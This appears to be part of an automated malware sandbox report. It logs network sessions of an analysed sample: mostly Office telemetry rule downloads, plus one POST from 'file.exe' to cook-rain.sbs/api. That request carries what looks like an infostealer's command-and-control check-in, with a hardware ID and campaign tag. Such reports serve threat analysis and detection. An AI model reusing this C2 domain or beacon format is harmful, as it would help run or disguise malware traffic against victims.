                                                                                                                                                                      2024-11-21 05:23:33 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      39192.168.2.64975013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:32 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:32 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                      x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052332Z-1777c6cb7549j9hhhC1TEBzmcc0000000agg00000000ffyd
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      40192.168.2.64975213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:32 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:33 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                      x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052333Z-1777c6cb754g9zd5hC1TEBfvpw0000000ang00000000u6q9
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      41192.168.2.64975313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:34 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                      x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052335Z-1777c6cb7544n7p6hC1TEByvb40000000at0000000009dwm
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:36 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      42192.168.2.649758188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:34 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 88
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:34 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=B065CA7CBA966C7B63CFCF7E6C45F838
                                                                                                                                                                      2024-11-21 05:23:35 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=gd0159adnsuq4drnd9c6t98nug; expires=Sun, 16-Mar-2025 23:10:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2QzpXXgK8Q2RSr%2FYUlu3NvuQU34nvv2ycd%2FHt9P5i0Xs2LwuF6GgAMo0EiHU%2BQsXJkcMmVTNviWPAOz77Vos64JFblxYEhebqAam1XMIVKk7bSpt7KScyqF3%2BlcSDkG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3fa058f39e02-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1952&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=985&delivery_rate=1530398&cwnd=244&unsent_bytes=0&cid=82dfa002430bdd92&ts=721&x=0"
                                                                                                                                                                      2024-11-21 05:23:35 UTC214INData Raw: 64 30 0d 0a 4f 6a 39 59 37 61 4b 6f 61 54 78 46 79 4e 52 64 63 77 2b 6b 6a 61 78 6a 4f 42 70 66 55 50 77 34 6a 64 74 6e 65 4c 6c 4b 33 4a 35 68 52 48 71 59 67 4a 4a 4c 56 44 47 38 70 47 63 76 49 50 69 69 6e 56 73 4e 4e 47 31 68 79 52 61 38 36 6c 52 57 69 48 79 41 73 56 56 5a 50 72 47 4e 7a 41 78 61 61 36 32 73 4f 46 45 6a 68 75 76 59 51 51 49 71 63 33 4b 5a 47 72 66 71 47 6c 54 43 61 4b 6d 38 41 42 30 77 6d 64 62 59 55 32 42 71 6c 50 74 73 53 7a 71 4b 76 35 31 57 46 69 74 75 59 39 49 4a 75 34 64 49 43 38 30 76 76 66 4e 6d 45 43 71 4d 7a 4d 77 47 55 57 75 74 72 44 68 52 49 34 62 72 32 45 45 43 4b 6e 4e 79 6d 52 71 33 36 68 6f 6c 0d 0a
                                                                                                                                                                      Data Ascii: d0Oj9Y7aKoaTxFyNRdcw+kjaxjOBpfUPw4jdtneLlK3J5hRHqYgJJLVDG8pGcvIPiinVsNNG1hyRa86lRWiHyAsVVZPrGNzAxaa62sOFEjhuvYQQIqc3KZGrfqGlTCaKm8AB0wmdbYU2BqlPtsSzqKv51WFituY9IJu4dIC80vvfNmECqMzMwGUWutrDhRI4br2EECKnNymRq36hol
                                                                                                                                                                      2024-11-21 05:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      43192.168.2.64975413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:34 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                      x-ms-request-id: 76e93f39-101e-0034-5559-3b96ff000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052335Z-178bfbc474b9fdhphC1NYCac0n0000000110000000002t3c
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      44192.168.2.64975513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:34 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                      x-ms-request-id: c296684d-b01e-0053-2a99-3bcdf8000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052335Z-r1d97b99577dd2gchC1TEBz5ys00000009rg00000000atm0
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:35 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      45192.168.2.64975613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:34 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                      x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052335Z-r1d97b99577ckpmjhC1TEBrzs000000009z00000000078uf
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      46192.168.2.64975713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:35 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:35 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                      x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052335Z-178bfbc474bv7whqhC1NYC1fg4000000011g000000008db7
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:35 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      47192.168.2.64975913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:37 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:37 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                      x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052337Z-178bfbc474bwlrhlhC1NYCy3kg00000000xg00000000syf2
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
